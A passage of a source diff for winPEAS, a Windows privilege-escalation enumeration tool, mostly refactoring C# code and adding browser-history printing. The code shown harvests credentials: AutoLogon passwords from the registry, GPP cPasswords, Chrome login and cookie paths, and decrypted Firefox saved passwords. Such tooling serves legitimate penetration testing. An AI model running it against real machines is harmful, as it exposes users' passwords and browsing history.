-                                to_add["ProcessID"] = itm.Proc.Id.ToString();
-                                to_add["ExecutablePath"] = itm.Pth;
-                                to_add["Product"] = companyName;
-                                to_add["Owner"] = itm.Owner == null ? "" : itm.Owner;
-                                to_add["isDotNet"] = isDotNet;
-                                to_add["CommandLine"] = itm.CommLine;
+                                Dictionary<string, string> to_add = new Dictionary<string, string>
+                                {
+                                    ["Name"] = itm.Proc.ProcessName,
+                                    ["ProcessID"] = itm.Proc.Id.ToString(),
+                                    ["ExecutablePath"] = itm.Pth,
+                                    ["Product"] = companyName,
+                                    ["Owner"] = itm.Owner == null ? "" : itm.Owner,
+                                    ["isDotNet"] = isDotNet,
+                                    ["CommandLine"] = itm.CommLine
+                                };
                                f_results.Add(to_add);
                            }
                        }
@@ -123,11 +124,13 @@ namespace winPEAS.Info.ProcessInfo

                        string hName = HandlesHelper.GetObjectName(dupHandle);

-                        Dictionary<string, string> to_add = new Dictionary<string, string>();
-                        to_add["Handle Name"] = hName;
-                        to_add["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")";
-                        to_add["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName;
-                        to_add["Reason"] = handlerExp.reason;
+                        Dictionary<string, string> to_add = new Dictionary<string, string>
+                        {
+                            ["Handle Name"] = hName,
+                            ["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")",
+                            ["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName,
+                            ["Reason"] = handlerExp.reason
+                        };

                        if (typeName == "process" || typeName == "thread")
                        {
--- a/winPEAS/winPEASexe/winPEAS/Info/ServicesInfo/ServicesInfoHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ServicesInfo/ServicesInfoHelper.cs
@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Diagnostics;
 using System.Linq;
@@ -8,10 +9,8 @@ using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using System.ServiceProcess;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;

 namespace winPEAS.Info.ServicesInfo
@@ -51,17 +50,18 @@ namespace winPEAS.Info.ServicesInfo

                                if (string.IsNullOrEmpty(companyName) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                                {
-                                    Dictionary<string, string> toadd = new Dictionary<string, string>();
-
-                                    toadd["Name"] = GetStringOrEmpty(result["Name"]);
-                                    toadd["DisplayName"] = GetStringOrEmpty(result["DisplayName"]);
-                                    toadd["CompanyName"] = companyName;
-                                    toadd["State"] = GetStringOrEmpty(result["State"]);
-                                    toadd["StartMode"] = GetStringOrEmpty(result["StartMode"]);
-                                    toadd["PathName"] = GetStringOrEmpty(result["PathName"]);
-                                    toadd["FilteredPath"] = binaryPath;
-                                    toadd["isDotNet"] = isDotNet;
-                                    toadd["Description"] = GetStringOrEmpty(result["Description"]);
+                                    Dictionary<string, string> toadd = new Dictionary<string, string>
+                                    {
+                                        ["Name"] = GetStringOrEmpty(result["Name"]),
+                                        ["DisplayName"] = GetStringOrEmpty(result["DisplayName"]),
+                                        ["CompanyName"] = companyName,
+                                        ["State"] = GetStringOrEmpty(result["State"]),
+                                        ["StartMode"] = GetStringOrEmpty(result["StartMode"]),
+                                        ["PathName"] = GetStringOrEmpty(result["PathName"]),
+                                        ["FilteredPath"] = binaryPath,
+                                        ["isDotNet"] = isDotNet,
+                                        ["Description"] = GetStringOrEmpty(result["Description"])
+                                    };

                                    results.Add(toadd);
                                }
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/GroupPolicy/GroupPolicy.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/GroupPolicy/GroupPolicy.cs
@@ -1,5 +1,5 @@
-using System.Collections.Generic;
-using Microsoft.Win32;
+using Microsoft.Win32;
+using System.Collections.Generic;
 using winPEAS.Helpers.Registry;
 using winPEAS.Native.Enums;

--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/NamedPipes/NamedPipes.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/NamedPipes/NamedPipes.cs
@@ -3,7 +3,6 @@ using System.IO;
 using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using winPEAS.Native;
-using System.Security.Principal;


 namespace winPEAS.Info.SystemInfo.NamedPipes
@@ -51,7 +50,7 @@ namespace winPEAS.Info.SystemInfo.NamedPipes
                {
                    var security = File.GetAccessControl($"\\\\.\\pipe\\{namedPipe}");
                    sddl = security.GetSecurityDescriptorSddlForm(AccessControlSections.All);
-                    List<string> currentUserPermsList = winPEAS.Helpers.PermissionsHelper.GetMyPermissionsF(security, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> currentUserPermsList = Helpers.PermissionsHelper.GetMyPermissionsF(security, Checks.Checks.CurrentUserSiDs);
                    currentUserPerms = string.Join(", ", currentUserPermsList);
                }
                catch
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SysMon/SysMon.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SysMon/SysMon.cs
@@ -2,7 +2,6 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics.Eventing.Reader;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
@@ -9,7 +9,6 @@ using System.Net.NetworkInformation;
 using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;

 namespace winPEAS.Info.SystemInfo
 {
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettings.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettings.cs
@@ -1,7 +1,5 @@
 using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
-using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

 namespace winPEAS.Info.SystemInfo.WindowsDefender
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettingsInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettingsInfo.cs
@@ -1,10 +1,4 @@
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.Info.SystemInfo.WindowsDefender
+namespace winPEAS.Info.SystemInfo.WindowsDefender
 {
    class WindowsDefenderSettingsInfo
    {
--- a/winPEAS/winPEASexe/winPEAS/Info/UserInfo/SAM/SamServer.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/UserInfo/SAM/SamServer.cs
@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Classes;

--- a/winPEAS/winPEASexe/winPEAS/Info/UserInfo/SID2GroupNameHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/UserInfo/SID2GroupNameHelper.cs
@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.Net.NetworkInformation;
 using System.Security.Principal;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;

 namespace winPEAS.Info.UserInfo
--- a/winPEAS/winPEASexe/winPEAS/Info/UserInfo/Tenant/Tenant.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/UserInfo/Tenant/Tenant.cs
@@ -3,7 +3,6 @@ using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.Security.Cryptography.X509Certificates;
 using System.Text;
-using winPEAS.Helpers;
 using winPEAS.Native;
 using winPEAS.Native.Structs;

--- a/winPEAS/winPEASexe/winPEAS/Info/UserInfo/User.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/UserInfo/User.cs
@@ -7,7 +7,6 @@ using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using winPEAS.Helpers;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Structs;

--- a/winPEAS/winPEASexe/winPEAS/Info/UserInfo/UserInfoHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/UserInfo/UserInfoHelper.cs
@@ -6,7 +6,6 @@ using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.UserInfo.SAM;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 using winPEAS.Native.Enums;

@@ -251,14 +250,15 @@ namespace winPEAS.Info.UserInfo

        public static Dictionary<string, string> GetAutoLogon()
        {
-            Dictionary<string, string> results = new Dictionary<string, string>();
-
-            results["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName");
-            results["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName");
-            results["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword");
-            results["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName");
-            results["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName");
-            results["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword");
+            Dictionary<string, string> results = new Dictionary<string, string>
+            {
+                ["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName"),
+                ["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName"),
+                ["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword"),
+                ["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName"),
+                ["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName"),
+                ["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword")
+            };
            return results;
        }

--- a/winPEAS/winPEASexe/winPEAS/InterestingFiles/GPP.cs
+++ b/winPEAS/winPEASexe/winPEAS/InterestingFiles/GPP.cs
@@ -15,7 +15,7 @@ namespace winPEAS.InterestingFiles

            try
            {
-                string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
+                string allUsers = Environment.GetEnvironmentVariable("ALLUSERSPROFILE");

                if (!allUsers.Contains("ProgramData"))
                {
@@ -225,11 +225,13 @@ namespace winPEAS.InterestingFiles
                        Changed = "[BLANK]";
                    }

-                    results[file] = new Dictionary<string, string>();
-                    results[file]["UserName"] = UserName;
-                    results[file]["NewName"] = NewName;
-                    results[file]["cPassword"] = cPassword;
-                    results[file]["Changed"] = Changed;
+                    results[file] = new Dictionary<string, string>
+                    {
+                        ["UserName"] = UserName,
+                        ["NewName"] = NewName,
+                        ["cPassword"] = cPassword,
+                        ["Changed"] = Changed
+                    };
                }
            }
            catch (Exception ex)
--- a/winPEAS/winPEASexe/winPEAS/InterestingFiles/InterestingFiles.cs
+++ b/winPEAS/winPEASexe/winPEAS/InterestingFiles/InterestingFiles.cs
@@ -28,7 +28,7 @@ namespace winPEAS.InterestingFiles
                    $@"{systemRoot}\System32\config\RegBack\SYSTEM",
                };

-                results.AddRange(searchLocations.Where(searchLocation => System.IO.File.Exists(searchLocation)));
+                results.AddRange(searchLocations.Where(searchLocation => File.Exists(searchLocation)));
            }
            catch (Exception ex)
            {
@@ -102,7 +102,7 @@ namespace winPEAS.InterestingFiles
                // Reference: https://stackoverflow.com/questions/18071412/list-filenames-in-the-recyclebin-with-c-sharp-without-using-any-external-files
                int lastDays = 30;

-                var startTime = System.DateTime.Now.AddDays(-lastDays);
+                var startTime = DateTime.Now.AddDays(-lastDays);

                // Shell COM object GUID
                Type shell = Type.GetTypeFromCLSID(new Guid("13709620-C279-11CE-A49E-444553540000"));
--- a/winPEAS/winPEASexe/winPEAS/InterestingFiles/Unattended.cs
+++ b/winPEAS/winPEASexe/winPEAS/InterestingFiles/Unattended.cs
@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles

            try
            {
-                var winDir = System.Environment.GetEnvironmentVariable("windir");
+                var winDir = Environment.GetEnvironmentVariable("windir");
                string[] searchLocations =
                {
                    $"{winDir}\\sysprep\\sysprep.xml",
@@ -56,7 +56,7 @@ namespace winPEAS.InterestingFiles
                    $"{winDir}\\..\\unattend.inf",
                };

-                results.AddRange(searchLocations.Where(System.IO.File.Exists));
+                results.AddRange(searchLocations.Where(File.Exists));
            }
            catch (Exception ex)
            {
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Chrome/Chrome.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Chrome/Chrome.cs
@@ -1,6 +1,7 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
+using System.Linq;
 using System.Text.RegularExpressions;
 using System.Web.Script.Serialization;
 using winPEAS.Checks;
@@ -27,7 +28,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
            {
                Beaprint.MainPrint("Looking for Chrome DBs");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, string> chromeDBs = Chrome.GetChromeDbs();
+                Dictionary<string, string> chromeDBs = GetChromeDbs();

                if (chromeDBs.ContainsKey("userChromeCookiesPath"))
                {
@@ -59,7 +60,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
            {
                Beaprint.MainPrint("Looking for GET credentials in Chrome history");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = Chrome.GetChromeHistBook();
+                Dictionary<string, List<string>> chromeHistBook = GetChromeHistBook();
                List<string> history = chromeHistBook["history"];
                List<string> bookmarks = chromeHistBook["bookmarks"];

@@ -77,8 +78,11 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                            Beaprint.AnsiPrint("    " + url, colorsB);
                        }
                    }
-
                    Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"Chrome history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                }
                else
                {
@@ -130,14 +134,14 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                else
                {
                    string userChromeCookiesPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
                    if (File.Exists(userChromeCookiesPath))
                    {
                        results["userChromeCookiesPath"] = userChromeCookiesPath;
                    }

                    string userChromeLoginDataPath =
-                        $"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
+                        $"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
                    if (File.Exists(userChromeLoginDataPath))
                    {
                        results["userChromeLoginDataPath"] = userChromeLoginDataPath;
@@ -156,7 +160,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
            List<string> results = new List<string>();

            // parses a Chrome history file via regex
-            if (System.IO.File.Exists(path))
+            if (File.Exists(path))
            {
                Regex historyRegex = new Regex(@"(http|ftp|https|file)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?");

@@ -217,10 +221,10 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
                }
                else
                {
-                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", Environment.GetEnvironmentVariable("USERPROFILE"));
                    results["history"] = ParseChromeHistory(userChromeHistoryPath);

-                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", Environment.GetEnvironmentVariable("USERPROFILE"));

                    results["bookmarks"] = ParseChromeBookmarks(userChromeBookmarkPath);
                }
@@ -241,7 +245,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
            {
                try
                {
-                    string contents = System.IO.File.ReadAllText(path);
+                    string contents = File.ReadAllText(path);

                    // reference: http://www.tomasvera.com/programming/using-javascriptserializer-to-parse-json-objects/
                    JavaScriptSerializer json = new JavaScriptSerializer();
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/FFLogins.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/FFLogins.cs
@@ -1,10 +1,4 @@
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.KnownFileCreds.Browsers.Firefox
+namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
    class FFLogins
    {
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
@@ -4,11 +4,11 @@ using System.Data;
 using System.IO;
 using System.Linq;
 using System.Text.RegularExpressions;
+using System.Web.Script.Serialization;
+using winPEAS._3rdParty.SQLite;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.KnownFileCreds.Browsers.Models;
-using winPEAS._3rdParty.SQLite;
-using System.Web.Script.Serialization;

 namespace winPEAS.KnownFileCreds.Browsers.Firefox
 {
@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
            {
                Beaprint.MainPrint("Looking for Firefox DBs");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxDBs = Firefox.GetFirefoxDbs();
+                List<string> firefoxDBs = GetFirefoxDbs();
                if (firefoxDBs.Count > 0)
                {
                    foreach (string firefoxDB in firefoxDBs) //No Beaprints because line needs red
@@ -56,21 +56,26 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
            {
                Beaprint.MainPrint("Looking for GET credentials in Firefox history");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> firefoxHist = Firefox.GetFirefoxHistory();
-                if (firefoxHist.Count > 0)
+                List<string> history = GetFirefoxHistory();
+                if (history.Count > 0)
                {
                    Dictionary<string, string> colorsB = new Dictionary<string, string>()
                    {
                        { Globals.PrintCredStrings, Beaprint.ansi_color_bad },
                    };

-                    foreach (string url in firefoxHist)
+                    foreach (string url in history)
                    {
                        if (MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex))
                        {
                            Beaprint.AnsiPrint("    " + url, colorsB);
                        }
                    }
+                    Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"Firefox history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                }
                else
                {
@@ -101,7 +106,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                        if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                        {
                            string userFirefoxBasePath = $"{dir}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
-                            if (System.IO.Directory.Exists(userFirefoxBasePath))
+                            if (Directory.Exists(userFirefoxBasePath))
                            {
                                var directories = Directory.EnumerateDirectories(userFirefoxBasePath);
                                foreach (string directory in directories)
@@ -248,6 +253,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                }

                foreach (string dir in dirs)
+                {
+                    if (Directory.Exists(dir))
                    {
                        string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
                        if (files.Length > 0)
@@ -269,6 +276,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                            FFDecryptor.NSS_Init(dir);
                            break;
                        }
+                    }

                }

@@ -313,8 +321,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox

                    foreach (Browsers.Firefox.LoginData loginData in ffLoginData.logins)
                    {
-                        string username = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedUsername);
-                        string password = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedPassword);
+                        string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
+                        string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
                        logins.Add(new CredentialModel
                        {
                            Username = username,
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/InternetExplorer.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/InternetExplorer.cs
@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.Browsers
            {
                Beaprint.MainPrint("Current IE tabs");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> urls = InternetExplorer.GetCurrentIETabs();
+                List<string> urls = GetCurrentIETabs();

                Dictionary<string, string> colorsB = new Dictionary<string, string>()
                {
@@ -51,9 +51,9 @@ namespace winPEAS.KnownFileCreds.Browsers
            {
                Beaprint.MainPrint("Looking for GET credentials in IE history");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = InternetExplorer.GetIEHistFav();
-                List<string> history = chromeHistBook["history"];
-                List<string> favorites = chromeHistBook["favorites"];
+                Dictionary<string, List<string>> ieHistoryBook = GetIEHistFav();
+                List<string> history = ieHistoryBook["history"];
+                List<string> favorites = ieHistoryBook["favorites"];

                if (history.Count > 0)
                {
@@ -69,8 +69,15 @@ namespace winPEAS.KnownFileCreds.Browsers
                            Beaprint.AnsiPrint("    " + url, colorsB);
                        }
                    }
-
                    Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"IE history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
+                }
+                else
+                {
+                    Beaprint.NotFoundPrint();
                }

                Beaprint.MainPrint("IE favorites");
@@ -91,7 +98,7 @@ namespace winPEAS.KnownFileCreds.Browsers
                { "favorites", new List<string>() },
            };

-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);

            try
            {
@@ -166,24 +173,15 @@ namespace winPEAS.KnownFileCreds.Browsers
                    if ((settings != null) && (settings.Count != 0))
                    {
                        foreach (KeyValuePair<string, object> kvp in settings)
-                        {
-                            byte[] timeBytes = RegistryHelper.GetRegValueBytes("HKCU", "SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime", kvp.Key.ToString().Trim());
-                            if (timeBytes != null)
-                            {
-                                long timeLong = (long)(BitConverter.ToInt64(timeBytes, 0));
-                                DateTime urlTime = DateTime.FromFileTime(timeLong);
-                                if (urlTime > startTime)
                        {
                            results["history"].Add(kvp.Value.ToString().Trim());
                        }
                    }
-                        }
-                    }
-
-                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));

+                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", Environment.GetEnvironmentVariable("USERPROFILE"));
+                    if (Directory.Exists(userIEBookmarkPath))
+                    {
                        string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
-
                        foreach (string bookmarkPath in bookmarkPaths)
                        {
                            using (StreamReader rdr = new StreamReader(bookmarkPath))
@@ -204,6 +202,7 @@ namespace winPEAS.KnownFileCreds.Browsers
                        }
                    }
                }
+            }
            catch (Exception ex)
            {
                Beaprint.GrayPrint(string.Format("  [X] Exception: {0}", ex));
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/KnownFileCredsInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/KnownFileCredsInfo.cs
@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
@@ -6,7 +7,6 @@ using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

@@ -123,7 +123,7 @@ namespace winPEAS.KnownFileCreds
            // parses recent file shortcuts via COM
            List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
            int lastDays = 7;
-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);

            try
            {
@@ -144,6 +144,8 @@ namespace winPEAS.KnownFileCreds
                        {
                            string recentPath = string.Format("{0}\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", dir);
                            try
+                            {
+                                if (Directory.Exists(recentPath))
                                {
                                    string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();

@@ -152,7 +154,7 @@ namespace winPEAS.KnownFileCreds
                                        Console.WriteLine("   {0} :\r\n", userName);
                                        foreach (string recentFile in recentFiles)
                                        {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);

                                            if (lastAccessed > startTime)
                                            {
@@ -174,14 +176,16 @@ namespace winPEAS.KnownFileCreds
                                        }
                                    }
                                }
+                            }
                            catch { }
                        }
                    }
                }
                else
                {
-                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", System.Environment.GetEnvironmentVariable("APPDATA"));
-
+                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", Environment.GetEnvironmentVariable("APPDATA"));
+                    if (Directory.Exists(recentPath))
+                    {
                        var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);

                        foreach (string recentFile in recentFiles)
@@ -190,7 +194,7 @@ namespace winPEAS.KnownFileCreds
                            //WshShell shell = new WshShell();
                            //IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);

-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);

                            if (lastAccessed > startTime)
                            {
@@ -210,6 +214,7 @@ namespace winPEAS.KnownFileCreds
                            }
                        }
                    }
+                }
                // release the WshShell COM object
                Marshal.ReleaseComObject(shellObj);
                shellObj = null;
@@ -237,13 +242,15 @@ namespace winPEAS.KnownFileCreds
                        string userName = parts[parts.Length - 1];
                        if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                        {
-                            List<string> userDPAPIBasePaths = new List<string>();
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                            List<string> userDPAPIBasePaths = new List<string>
+                            {
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                            };

                            foreach (string userDPAPIBasePath in userDPAPIBasePaths)
                            {
-                                if (System.IO.Directory.Exists(userDPAPIBasePath))
+                                if (Directory.Exists(userDPAPIBasePath))
                                {
                                    var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                                    foreach (string directory in directories)
@@ -254,9 +261,9 @@ namespace winPEAS.KnownFileCreds
                                        {
